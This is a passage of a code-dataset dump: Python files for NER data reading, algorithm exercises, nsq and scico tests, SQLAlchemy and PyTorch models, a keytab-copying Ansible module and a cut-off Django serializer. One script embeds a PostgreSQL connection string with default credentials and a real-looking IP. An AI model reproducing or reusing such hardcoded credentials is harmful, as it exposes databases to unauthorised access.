print('---------')\n\n entities_train += document_entities\n endings_train += document_normalization\n\n for filename in tqdm.tqdm(eval, total=len(eval)):\n text_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".txt\"\n annotation_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".ann\"\n normalization_filename = \"data/train_new/named/norm/\" + filename + \".norm\"\n document_entities, document_normalization = reader.read(text_filename, annotation_filename,\n normalization_filename)\n\n if len(document_entities) != len(document_normalization):\n print(filename)\n print('---------')\n\n entities_eval += document_entities\n endings_eval += document_normalization\n\n reader.normalization_endings.append('')\n reader.normalization_endings.append('')\n reader.normalization_endings = set(reader.normalization_endings)\n\n return entities_train, endings_train, entities_eval, endings_eval, reader.normalization_endings\n\nif __name__ == '__main__':\n entities_train, endings_train, entities_eval, endings_eval, normalization_endings = collect_sentences_for_sequence_tagging()\n\n counter = 0\n for entity, norm in zip(entities_train, endings_train):\n print(entity, norm)\n counter += 1\n if counter == 100:\n break\n\n\n\n \"\"\"\n text_filename = \"data/train_new/named/texts_and_ann/970431.txt\"\n annotation_filename = \"data/train_new/named/texts_and_ann/970431.ann\"\n normalization_filename = \"data/train_new/named/norm/970431.norm\"\n reader = RuNormASReaderForSequenceTagging()\n document_entities, document_normalization, = reader.read(text_filename, annotation_filename, normalization_filename)\n\n for entity, norm in zip(document_entities, document_normalization):\n print(entity, norm)\"\"\"","sub_path":"deprecated_code/reader_without_context.py","file_name":"reader_without_context.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"593418146","text":"import time\n\nimport numpy as np\n\nimport controllers.polarization as p_ctrl\n\nt_t = lambda b, t, vec: np.multiply(vec[0], t) + np.multiply(vec[1], b)\n\nlogfile = open(\"logfile_transform_jo_vec.txt\", mode=\"a\")\nlogfile.write(\"\\n\\r\\n\\r\" + time.asctime() + \"\\n\")\n\n\ndef main():\n p1 = [-1, 1, 0]\n s1 = [1, -1, 0]\n p1 = p1 / np.linalg.norm(p1)\n s1 = s1 / np.linalg.norm(s1)\n p = np.asarray([1, 1, 0])\n s = np.asarray([-1, 1, 0])\n p = p / np.linalg.norm(p)\n s = s / np.linalg.norm(s)\n t = [1, 0, 0]\n b = [0, 1, 0]\n jo_v = [1, 1]\n test_and_log(p, s, p1, s1, jo_v)\n\n\ndef test_and_log(t, b, p, s, jo_v):\n res1 = p_ctrl.transform_jo_vec_equation(b, t, s, p, jo_v)\n res2 = p_ctrl.transform_jo_vec(b, t, s, p, jo_v)\n res3 = t_t(s, p, res1)\n res4 = t_t(s, p, res2)\n res = t_t(b, t, jo_v)\n print(f\"from\\nt = {t}\\nb = {b}\\njo_v_tb = {jo_v}\\ncoords = {res}\\n\" +\n f\"to\\np = {p}\\ns = {s}\\njo_v_ps eq = {res1}\\njo_v_ps = {res2}\\n\" +\n f\"coords sp eq = {res3}\\ncoords sp = {res4}\\n\" +\n f\"diff = {res3 - res4}\\n\" +\n f\"diff eq tr {res - res3}\\n\" +\n f\"diff tr {res - res4}\", file=logfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/testing/coord_transform.py","file_name":"coord_transform.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"79318283","text":"class Solution:\n \n # Greedy Enumeration (go down faster) [96%]\n def numSquares(self, n):\n print(\"Greedy Enumeration (Solution)\")\n def is_divided_by(n, count):\n \"\"\"\n return: true if \"n\" can be decomposed into \"count\" number of perfect square numbers.\n e.g. n=12, count=3: true.\n n=12, count=2: false\n \"\"\"\n if count == 1:\n return n in square_nums\n \n for k in square_nums:\n if is_divided_by(n - k, count - 1):\n return True\n return False\n\n square_nums = set([i * i for i in range(1, int(n**0.5)+1)])\n \n for count in range(1, n+1):\n if is_divided_by(n, count):\n return count\n \n #===========================================\n \n # Bottom-up DP (Solution) [O(N*sqrtN), 44%]\n def numSquares2(self, n):\n print(\"Bottom-Up DP (Solution)\")\n square_nums = [i**2 for i in range(0, int(math.sqrt(n))+1)]\n \n dp = [float('inf')] * (n+1)\n # bottom case\n dp[0] = 0\n \n for i in range(1, n+1):\n for square in square_nums:\n if i < square:\n break\n dp[i] = min(dp[i], dp[i-square] + 1)\n \n return dp[-1]\n \n #===========================================\n\n # Bottom-up DP [O(N*sqrtN), 58%]\n def numSquares2(self, n: int) -> int:\n print(\"Bottom-Up DP\")\n if n == 1:\n return 1\n \n # Prepare the array for square numbers\n arr = []\n for e in range(1, n):\n if pow(e, 2) > n:\n break\n arr.append(pow(e, 2))\n \n # Initialization\n res = [0] * (n + 1)\n res[1] = 1 \n \n # DP loop \n for i in range(2, n + 1):\n minValue = float('inf')\n for j in range(len(arr)): #Loop all the number smaller than current \n if arr[j] > i:\n break\n idx = i - arr[j]\n if res[idx] < minValue:\n minValue = res[idx]\n res[i] = minValue + 1\n # Debug \n # for i, v in enumerate(res):\n # print(i, \":\", v)\n \n return res[n]\n \n #===========================================\n \n # Memoization [TLE]\n def numSquares2(self, n: int) -> int:\n print(\"Top-Down DP\")\n if n == 1:\n return 1\n \n arr = []\n for e in range(1, n):\n if pow(e, 2) > n:\n break\n arr.append(pow(e, 2))\n #arr = arr[::-1]\n #print(arr)\n dic = {0:0, 1:1}\n \n ans = self.helper(arr, n, dic)\n #print(dic)\n return ans\n \n def helper(self, arr, target, memo):\n #print(\"target:\", target, memo)\n if target == 0:\n return 0\n elif target == 1:\n return 1\n elif target < 0:\n return 99999\n \n if target in memo:\n return memo[target]\n \n minValue = float('inf')\n for i in range(len(arr)):\n minValue = min(minValue, 1 + self.helper(arr, target-arr[i], memo))\n \n memo[target] = minValue\n #print(\"**memo[target]:\", memo[target])\n return memo[target]","sub_path":"algo/dp/_0279_PerfectSquares.py","file_name":"_0279_PerfectSquares.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553027355","text":"import asyncio\nimport sys\n\nfrom asyncnsq.consumer import NsqConsumer\nfrom asyncnsq.http import Nsqd\nfrom asyncnsq.http.exceptions import NotFoundError\nfrom asyncnsq.nsq import create_nsq\n\nfrom ._testutils import BaseTest, run_until_complete\n\n\nclass NsqTest(BaseTest):\n def setUp(self):\n self.topic = 'foo'\n self.host = '127.0.0.1'\n self.port = 4150\n self.lookupd_port = 4161\n self.max_in_flight = 25\n self.total_test_msgs = 100\n self.test_range = range(1, self.total_test_msgs + 1)\n super().setUp()\n\n async def aioSetUp(self):\n self.producer = Nsqd(self.host, self.port+1, loop=self.loop)\n self.consumer = NsqConsumer(nsqd_tcp_addresses=[(self.host,\n self.port)],\n max_in_flight=self.max_in_flight,\n loop=self.loop)\n\n for i in self.test_range:\n await self.producer.pub(self.topic, 'xxx:{}'.format(i))\n\n await asyncio.sleep(0.1, loop=self.loop)\n\n await self.consumer.connect()\n\n async def aioTearDown(self):\n await self.consumer.close()\n try:\n await self.producer.delete_topic(self.topic)\n except NotFoundError:\n pass\n finally:\n await self.producer.close()\n\n @run_until_complete\n async def test_consumer_waiters(self):\n await self.consumer.subscribe(self.topic, 'test_consumer')\n\n msgs = []\n\n for counter, waiter in enumerate(self.consumer.wait_messages(), 1):\n if self.consumer.is_starved():\n for msg in msgs:\n self.assertIn(int(msg.text().split(':')[-1]),\n self.test_range)\n await msg.fin()\n msgs = []\n\n if counter <= self.total_test_msgs:\n msg = await waiter\n msgs.append(msg)\n continue\n\n break\n\n @run_until_complete\n async def test_consumer_async_for(self):\n await self.consumer.subscribe(self.topic, 'test_consumer')\n\n if sys.version_info >= (3, 6):\n counter = 1\n\n async for msg in self.consumer.messages():\n if counter == self.total_test_msgs:\n break\n\n counter += 1\n self.assertIn(int(msg.text().split(':')[-1]),\n self.test_range)\n await msg.fin()\n\n else:\n with self.assertRaises(AttributeError):\n self.consumer.messages()\n\n @run_until_complete\n async def test_wait_for_topic(self):\n lookupd_addresses = [(self.host, self.lookupd_port)]\n self.consumer = NsqConsumer(lookupd_http_addresses=lookupd_addresses,\n max_in_flight=self.max_in_flight,\n lookupd_poll_interval=2,\n loop=self.loop)\n\n nonexistent_topic = 'moo'\n sub_coro = self.consumer.subscribe(nonexistent_topic, 'bar')\n sub_task = self.loop.create_task(sub_coro)\n\n await asyncio.sleep(1)\n\n await self.producer.pub(nonexistent_topic, 'test_msg')\n\n await sub_task\n\n msg = await self.consumer._queue.get()\n\n self.assertEqual('test_msg', msg.text())\n","sub_path":"tests/test_consumer.py","file_name":"test_consumer.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"54061965","text":"from datetime import date, datetime\nfrom typing import Union\n\nfrom sqlalchemy import (Boolean, Column, Date, DateTime, ForeignKey, Integer,\n SmallInteger, String)\nfrom sqlalchemy.ext.orderinglist import ordering_list\nfrom sqlalchemy.orm import relationship\n\nfrom .base import PkModel, PkModelWithTimestamps\nfrom .relation_table import product_paintwork_table, product_sculptor_table\n\n__all__ = [\n \"ProductOfficialImage\",\n \"ProductReleaseInfo\",\n \"Product\"\n]\n\n\nclass ProductOfficialImage(PkModel):\n __tablename__ = \"product_official_image\"\n\n url = Column(String)\n order = Column(Integer)\n product_id = Column(Integer, ForeignKey(\"product.id\", ondelete=\"CASCADE\"), nullable=False)\n\n @classmethod\n def create_image_list(cls: 'ProductOfficialImage', image_urls: list[str]) -> list['ProductOfficialImage']:\n images = []\n\n for url in image_urls:\n image = ProductOfficialImage(url=url)\n images.append(image)\n\n return images\n\n\nclass ProductReleaseInfo(PkModelWithTimestamps):\n __tablename__ = \"product_release_info\"\n\n price = Column(Integer)\n tax_including = Column(Boolean)\n initial_release_date = Column(Date, nullable=True)\n delay_release_date = Column(Date)\n announced_at = Column(Date)\n shipped_at = Column(Date)\n product_id = Column(Integer, ForeignKey(\"product.id\", ondelete=\"CASCADE\"), nullable=False)\n\n def postpone_release_date_to(self, delay_date: Union[date, datetime, None]):\n if not delay_date:\n return\n\n if isinstance(delay_date, datetime):\n delay_date = delay_date.date()\n\n valid_type = isinstance(delay_date, date)\n if not valid_type:\n raise TypeError(f\"{delay_date} must be `date` or `datetime`\")\n\n has_init_release_date = bool(self.initial_release_date)\n\n if not has_init_release_date:\n self.update(delay_release_date=delay_date)\n if has_init_release_date:\n if self.initial_release_date < delay_date:\n self.update(delay_release_date=delay_date)\n if self.initial_release_date > delay_date:\n raise ValueError(\n f\"delay_date {delay_date} should be later than initial_release_date {self.initial_release_date}\"\n )\n\n def stall(self):\n self.update(initial_release_date=None, delay_release_date=None)\n\n\nclass Product(PkModelWithTimestamps):\n \"\"\"\n ## Column\n + checksum: MD5 value, one of methods to check the product should be updated.\n \"\"\"\n __tablename__ = \"product\"\n\n # ---native columns---\n name = Column(String, nullable=False)\n size = Column(SmallInteger)\n scale = Column(SmallInteger)\n resale = Column(Boolean)\n adult = Column(Boolean)\n copyright = Column(String)\n url = Column(String)\n jan = Column(String(13), unique=True)\n id_by_official = Column(String)\n checksum = Column(String(32))\n order_period_start = Column(DateTime(timezone=True))\n order_period_end = Column(DateTime(timezone=True))\n thumbnail = Column(String)\n og_image = Column(String)\n\n # ---Foreign key columns---\n series_id = Column(Integer, ForeignKey(\"series.id\"))\n series = relationship(\n \"Series\",\n backref=\"products\",\n lazy=\"joined\",\n )\n\n category_id = Column(Integer, ForeignKey(\"category.id\"))\n category = relationship(\n \"Category\",\n backref=\"products\",\n lazy=\"joined\",\n )\n\n manufacturer_id = Column(Integer, ForeignKey(\"company.id\"))\n manufacturer = relationship(\n \"Company\",\n backref=\"made_products\",\n primaryjoin=\"Product.manufacturer_id == Company.id\",\n lazy=\"joined\"\n )\n\n releaser_id = Column(Integer, ForeignKey(\"company.id\"))\n releaser = relationship(\n \"Company\",\n backref=\"released_products\",\n primaryjoin=\"Product.releaser_id == Company.id\",\n lazy=\"joined\"\n )\n\n distributer_id = Column(Integer, ForeignKey(\"company.id\"))\n distributer = relationship(\n \"Company\",\n backref=\"distributed_products\",\n primaryjoin=\"Product.distributer_id == Company.id\",\n lazy=\"joined\"\n )\n # ---relationships field---\n release_infos = relationship(\n ProductReleaseInfo,\n backref=\"product\",\n order_by=\"nulls_first(asc(ProductReleaseInfo.initial_release_date))\",\n cascade=\"all, delete\",\n passive_deletes=True,\n )\n official_images = relationship(\n ProductOfficialImage,\n backref=\"product\",\n order_by=\"ProductOfficialImage.order\",\n collection_class=ordering_list(\"order\", count_from=1),\n cascade=\"all, delete\",\n passive_deletes=True\n )\n sculptors = relationship(\n \"Sculptor\",\n secondary=product_sculptor_table,\n backref=\"products\",\n lazy=\"joined\",\n )\n paintworks = relationship(\n \"Paintwork\",\n secondary=product_paintwork_table,\n backref=\"products\",\n lazy=\"joined\",\n )\n\n def last_release(self) -> Union[ProductReleaseInfo, None]:\n release_infos = self.release_infos\n if release_infos:\n return release_infos[-1]\n return None\n\n def check_checksum(self, checksum: str) -> bool:\n return checksum == self.checksum\n","sub_path":"libs/figure_hook/src/figure_hook/Models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420937044","text":"import numpy as np\n\nimport jax\n\nimport pytest\n\nfrom scico.linop import Convolve, Identity, LinearOperatorStack\nfrom scico.test.linop.test_linop import adjoint_AAt_test, adjoint_AtA_test\n\n\nclass TestLinearOperatorStack:\n def setup_method(self, method):\n self.key = jax.random.PRNGKey(12345)\n\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_construct(self, jit):\n # requires a list of LinearOperators\n I = Identity((42,))\n with pytest.raises(ValueError):\n H = LinearOperatorStack(I, jit=jit)\n\n # checks input sizes\n A = Identity((3, 2))\n B = Identity((7, 2))\n with pytest.raises(ValueError):\n H = LinearOperatorStack([A, B], jit=jit)\n\n # in general, returns a BlockArray\n A = Convolve(np.ones((3, 3)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == ((11, 17), (10, 16))\n\n # ... result should be [A@x, B@x]\n assert np.allclose(y[0], A @ x)\n assert np.allclose(y[1], B @ x)\n\n # by default, collapse to DeviceArray when possible\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == (2, 10, 16)\n\n # ... result should be [A@x, B@x]\n assert np.allclose(y[0], A @ x)\n assert np.allclose(y[1], B @ x)\n\n # let user turn off collapsing\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=False, jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == ((10, 16), (10, 16))\n\n @pytest.mark.parametrize(\"collapse\", [False, True])\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_adjoint(self, collapse, jit):\n # general case\n A = Convolve(np.ones((3, 3)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n adjoint_AtA_test(H, self.key)\n adjoint_AAt_test(H, self.key)\n\n # collapsable case\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n adjoint_AtA_test(H, self.key)\n adjoint_AAt_test(H, self.key)\n\n @pytest.mark.parametrize(\"collapse\", [False, True])\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_algebra(self, collapse, jit):\n # adding\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n\n A = Convolve(np.random.rand(2, 2), (9, 15))\n B = Convolve(np.random.rand(2, 2), (9, 15))\n G = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n\n x = np.ones((9, 15))\n S = H + G\n\n # test correctness of adding\n assert S.output_shape == H.output_shape\n assert S.input_shape == H.input_shape\n np.testing.assert_allclose((S @ x)[0], (H @ x + G @ x)[0])\n np.testing.assert_allclose((S @ x)[1], (H @ x + G @ x)[1])\n\n # result of adding two conformable stacks should be a stack\n assert isinstance(S, LinearOperatorStack)\n assert isinstance(H - G, LinearOperatorStack)\n\n # scalar multiplication\n assert isinstance(1.0 * H, LinearOperatorStack)\n\n # op scaling\n scalars = [2.0, 3.0]\n y1 = S @ x\n S2 = S.scale_ops(scalars)\n y2 = S2 @ x\n\n np.testing.assert_allclose(scalars[0] * y1[0], y2[0])\n","sub_path":"scico/test/linop/test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191151710","text":"\"\"\"CapsGNN layers.\"\"\"\nfrom functools import partial\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom denseGCNConv import DenseGCNConv\nimport torch.nn.functional as F\nfrom torch_geometric.nn.inits import glorot\nfrom disentangle import linearDisentangle\n\n\ndef squash(input_tensor, dim=-1, epsilon=1e-7):\n squared_norm = (input_tensor ** 2).sum(dim=dim, keepdim=True)\n safe_norm = torch.sqrt(squared_norm + epsilon)\n scale = squared_norm / (1 + squared_norm)\n unit_vector = input_tensor / safe_norm\n return scale * unit_vector\n\ndef sparse2dense(x, new_size, mask):\n out = torch.zeros(new_size).cuda()\n out[mask] = x\n return out\n\nclass firstCapsuleLayer(torch.nn.Module):\n def __init__(self, number_of_features, max_node_num, capsule_dimensions, disentangle_num, dropout):\n super(firstCapsuleLayer, self).__init__()\n\n self.number_of_features = number_of_features\n self.max_node_num = max_node_num\n self.capsule_dimensions = capsule_dimensions\n self.disentangle_num = disentangle_num\n self.dropout = nn.Dropout(p=dropout)\n\n self.bns_disen = nn.BatchNorm1d(self.number_of_features)\n self.disen = torch.nn.ModuleList()\n for i in range(self.disentangle_num):\n self.disen.append(linearDisentangle(self.number_of_features, self.capsule_dimensions//self.disentangle_num))\n\n def forward(self, x, adj, mask, batch):\n x_size = x.size()\n x = x[mask] # (N1+N2+...+Nm)*d\n out = []\n x = self.bns_disen(x)\n for i, disen in enumerate(self.disen):\n temp = F.relu(disen(x))\n temp = self.dropout(temp)\n out.append(temp)\n\n # Combine features from the K different spaces\n out = torch.cat(out, dim=-1)\n out = sparse2dense(out, (x_size[0], x_size[1], out.size(-1)), mask) # [Batch*N*hidden]\n out = squash(out)\n return out\n\n\nclass SecondaryCapsuleLayer(torch.nn.Module):\n def __init__(self, num_iterations, num_routes, num_capsules, in_channels, out_channels, dropout):\n super(SecondaryCapsuleLayer, self).__init__()\n self.num_prim_cap = num_routes\n self.num_digit_cap = num_capsules\n self.in_cap_dim = in_channels\n self.out_cap_dim = out_channels\n self.dropout = nn.Dropout(p=dropout)\n self.num_iterations = num_iterations\n self.bn_feat = nn.BatchNorm1d(self.in_cap_dim)\n self.convs = torch.nn.ModuleList()\n for i in range(self.num_digit_cap): \n self.convs.append(DenseGCNConv(self.in_cap_dim, self.out_cap_dim))\n \n def forward(self, x, adj, mask=None):\n batch_size = x.size(0) # [bs, num_prim_caps, prim_cap_dim]\n \n if mask is not None:\n x_size = x.size()\n x = x[mask] # (N1+N2+...+Nm)*d\n x = self.bn_feat(x)\n x = sparse2dense(x, x_size, mask)\n else:\n x = x.view(-1, self.in_cap_dim)\n x = self.bn_feat(x)\n x = x.view(batch_size, -1, self.in_cap_dim)\n \n u_hat = []\n for i, conv in enumerate(self.convs):\n if mask is not None:\n temp = conv(x, adj, mask)\n else:\n temp = conv(x, adj)\n u_hat.append(temp)\n u_hat = torch.stack(u_hat, dim=2).unsqueeze(4)\n\n # detach u_hat during routing iterations to prevent gradients from flowing\n temp_u_hat = u_hat.detach()\n\n b_ij = torch.zeros(batch_size, u_hat.size(1), u_hat.size(2), 1, 1).cuda()\n for i in range(self.num_iterations - 1):\n c_ij = F.softmax(b_ij, dim=2)\n s_j = (c_ij * temp_u_hat).sum(dim=1, keepdim=True) # [bs, 1, 10, 16, 1]\n v = squash(s_j, dim=-2)\n\n u_produce_v = torch.matmul(temp_u_hat.transpose(-1, -2), v)\n b_ij = b_ij + u_produce_v # [bs, 1152, 10, 1, 1]\n \n c_ij = F.softmax(b_ij, dim=2)\n s_j = (c_ij * u_hat).sum(dim=1, keepdim=True)\n \n # Residual connection\n s_j += torch.mean(x, dim=1)[:,None, None,:,None]\n\n v = squash(s_j, dim=-2)\n c_ij = c_ij.squeeze(4).squeeze(3)\n\n if mask is not None:\n c_ij = c_ij * mask[:, :, None]\n\n # update the adjacent matrix\n adj = torch.transpose(c_ij, 2, 1) @ adj @ c_ij\n return v, c_ij, adj\n\n\nclass ReconstructionNet(nn.Module):\n def __init__(self, n_dim, n_classes, hidden):\n super(ReconstructionNet, self).__init__()\n self.n_dim = n_dim\n self.n_classes = n_classes\n self.fc1 = nn.Linear(n_dim * n_classes, hidden)\n\n def forward(self, first_capsule, class_capsule, y):\n mask = torch.zeros((class_capsule.size(0), self.n_classes))\n mask = mask.cuda()\n mask.scatter_(1, y.view(-1, 1), 1.)\n mask = mask.unsqueeze(2)\n class_capsule = class_capsule * mask\n class_capsule = class_capsule.view(-1, 1, self.n_dim * self.n_classes)\n\n # combine the first capsule and the class capsule (class-conditional)\n N = first_capsule.size(1)\n class_capsule = F.relu(self.fc1(class_capsule)) \n x = first_capsule + class_capsule\n x = torch.matmul(x, torch.transpose(x, 2, 1))\n return x","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"320131692","text":"# Дана цілочислова прямокутна матриця.\r\n# Визначити суму від’ємних елементів матриці з обома парними індексами.\r\n\r\nfrom random import randint\r\nn=int(input(\"Кількість рядків: \"))\r\nm=int(input(\"Кількість стовпців: \"))\r\nmatrix = [[randint(-20, 20) for j in range(m)] for i in range(n)]\r\nprint(matrix)\r\n\r\nd = 0\r\nfor i in range(n):\r\n for j in range(n):\r\n if i%2 == 0 and j%2 ==0:\r\n if matrix[i][j]<0:\r\n d += matrix[i][j]\r\nprint(f\"Сума від’ємних елементів матриці з обома парними індексами = {d}\")\r\n\r\n\r\n\r\n","sub_path":"lab7/lab7z1.py","file_name":"lab7z1.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"363007880","text":"#!/usr/bin/env python\n\n# IMPORT Python Libs\nimport os\nimport sys\n\n# IMPORT SQLAlchemy Dependencies\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.sql import func\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.exc import SQLAlchemyError\n\n# # Import Scripts\n# import lf_connect\n#\n# engine, Base = lf_connect.connect()\nengine = create_engine('postgresql://postgres:postgres@129.25.140.165:5432/postgres')\nBase = declarative_base()\n\nclass Job(Base):\n __tablename__ = 'job'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(1000), nullable=False)\n frange = Column(String(10), nullable=False)\n projdir = Column(String(1000), nullable=False)\n filepath = Column(String(1000), nullable=False)\n imagedir = Column(String(1000), nullable=False)\n status = Column(String(12), default='WAITING', nullable=False)\n time_created = Column(DateTime(timezone=True), server_default=func.now())\n\n def __init__(self, name, frange, projdir, filepath, imagedir):\n self.name = name\n self.frange = frange\n self.projdir = projdir\n self.filepath = filepath\n self.imagedir = imagedir\n\nBase.metadata.create_all(engine)\nSession = sessionmaker(bind=engine)\nsesh = Session()\n\n\n# Add new Job listing to the DB session\ndef addJob(name, frange, projdir, filepath, imagedir):\n job = Job(\n name=name,\n frange=frange,\n projdir=projdir,\n filepath=filepath,\n imagedir=imagedir\n )\n sesh.add(job)\n return job\n\n\n# Commit Session changes to the DB\n# Rollback any changes upon Error\ndef commitSession():\n try:\n sesh.commit()\n except SQLAlchemyError as error:\n sesh.rollback()\n print (str(error))\n\n\n\n# TESTING : Print out DB\ndef getJobs():\n for j in sesh.query(Job).all():\n print ('name: %s' % j.name)\n print ('frame range: %s' % j.frange)\n print ('project dir: %s' % j.projdir)\n print ('file path: %s' % j.filepath)\n print ('image dir: %s' % j.imagedir)\n print ('status: %s' % j.status)\n print ('created: %s' % j.time_created)\n\n\n# Pass Job id, removes from Job Table\ndef deleteJobById(id):\n sesh.query(Job).filter_by(id=id).delete()\n commitSession()\n\n\n# Pass Table Object to delete a table\n# RISKY FUNCTION\ndef deleteTable(tb):\n tb.__table__.drop(engine)\n commitSession()\n\n\n# Execute the Main Event Loop\nif __name__ == \"__main__\":\n # addJob(\n # 'LAW_xyz_010_TEST',\n # '1-120',\n # 'C:/Users/IanHartman',\n # 'C:/Users/IanHartman/scenes',\n # 'C:/Users/IanHartman/images'\n # )\n # commitSession()\n getJobs()\n engine.dispose()\n","sub_path":"LobsterFarm.py","file_name":"LobsterFarm.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"481694790","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n# Config.py\n#\n# @author chenzhao\n# @since 2017-12-02\n\n\"\"\"\n配置读取与管理\n\"\"\"\n\nimport configparser\nimport os\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nENV = 'local' # 可选值: local, dev\n\nProperties = configparser.ConfigParser()\nProperties.read(\"{}/resources/{}/default.conf\".format(PROJECT_ROOT, ENV))\n\n\ndef getValue(section, field):\n \"\"\"\n 根据section和field获取对应的String值\n\n :param section:\n :param field:\n :return:\n \"\"\"\n try:\n return Properties.get(section, field)\n except Exception as e:\n raise Exception(\"读取{}配置{}出错\".format(section, field))\n\n\ndef getIntValue(section, field):\n \"\"\"\n 根据section和field获取对应的Int值\n\n :param section:\n :param field:\n :return:\n \"\"\"\n try:\n return Properties.getint(section, field)\n except Exception as e:\n raise Exception(\"读取{}配置{}出错\".format(section, field))\n\n\ndef getBooleanValue(section, field):\n \"\"\"\n 根据section和field获取对应的Boolean值\n\n :param section:\n :param field:\n :return:\n \"\"\"\n try:\n return Properties.getboolean(section, field)\n except Exception as e:\n raise Exception(\"读取{}配置{}出错\".format(section, field))\n\n\ndef getFloatValue(section, field):\n \"\"\"\n 根据section和field获取对应的Float值\n\n :param section:\n :param field:\n :return:\n \"\"\"\n try:\n return Properties.getfloat(section, field)\n except Exception as e:\n raise Exception(\"读取{}配置{}出错\".format(section, field))\n","sub_path":"api/base/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"595985973","text":"#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\"\"\"Copy keys from one keytab to another.\nCurrently, only the Heimdal implementation works\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom ansible.module_utils.basic import *\nimport os\nimport subprocess\n\n__author__ = 'mgallet'\nMIT_IMPL = 'mit'\nHEIMDAL_IMPL = 'heimdal'\n\n\ndef heimdal_copy_keytabs(src_path, dest_path):\n dest_keys = set()\n if os.path.isfile(dest_path):\n dest_keys_data = subprocess.check_output(['ktutil', '-k', dest_path, 'list'])\n dest_keys = {x.split()[2] for x in dest_keys_data.decode('utf-8').splitlines()[3:] if len(x.split()) > 2}\n src_keys = set()\n if os.path.isfile(src_path):\n src_key_data = subprocess.check_output(['ktutil', '-k', src_path, 'list'])\n src_keys = {x.split()[2] for x in src_key_data.decode('utf-8').splitlines()[3:] if len(x.split()) > 2}\n if src_keys - dest_keys:\n subprocess.check_output(['ktutil', 'copy', src_path, dest_path])\n\n\ndef main():\n module = AnsibleModule(argument_spec={'src': {'required': True}, 'dest': {'required': True},\n 'impl': {'default': HEIMDAL_IMPL, 'choices': [MIT_IMPL, HEIMDAL_IMPL]}})\n params = module.params\n src_path = os.path.abspath(os.path.expanduser(params['src']))\n dest_path = os.path.abspath(os.path.expanduser(params['dest']))\n impl = params['impl']\n if impl == MIT_IMPL:\n raise ValueError('MIT not implemented yet')\n if impl == HEIMDAL_IMPL:\n heimdal_copy_keytabs(src_path=src_path, dest_path=dest_path)\n\nif __name__ == '__main__':\n main()\n","sub_path":"penates/commands/library/merge_keytab.py","file_name":"merge_keytab.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"332599048","text":"import logging\n\nfrom django_redis import get_redis_connection\nfrom redis import RedisError\nfrom rest_framework import serializers\n\nlogger = logging.getLogger('meiduoshangcheng')\n\nclass RegisterSmsCodeSerializer(serializers.Serializer):\n \"\"\"\n 校验 验证码和image_code_id\n \"\"\"\n text = serializers.CharField(label='用户输入的验证码', max_length=4, min_length=4, required=True)\n image_code_id = serializers.UUIDField(label='验证码唯一性id')\n\n def validate(self, attrs):\n text = attrs['text']\n image_code_id = attrs['image_code_id']\n\n redis_conn = get_redis_connection('code')\n\n # image_code_id可能是uuid类型的数据,需要str转换一下,才能字符串相加\n # redis_text = redis_conn.get('img_' + image_code_id)\n\n redis_text = redis_conn.get('img_%s'%image_code_id)\n\n if redis_text is None:\n raise serializers.ValidationError('图片验证码过期')\n\n try:\n 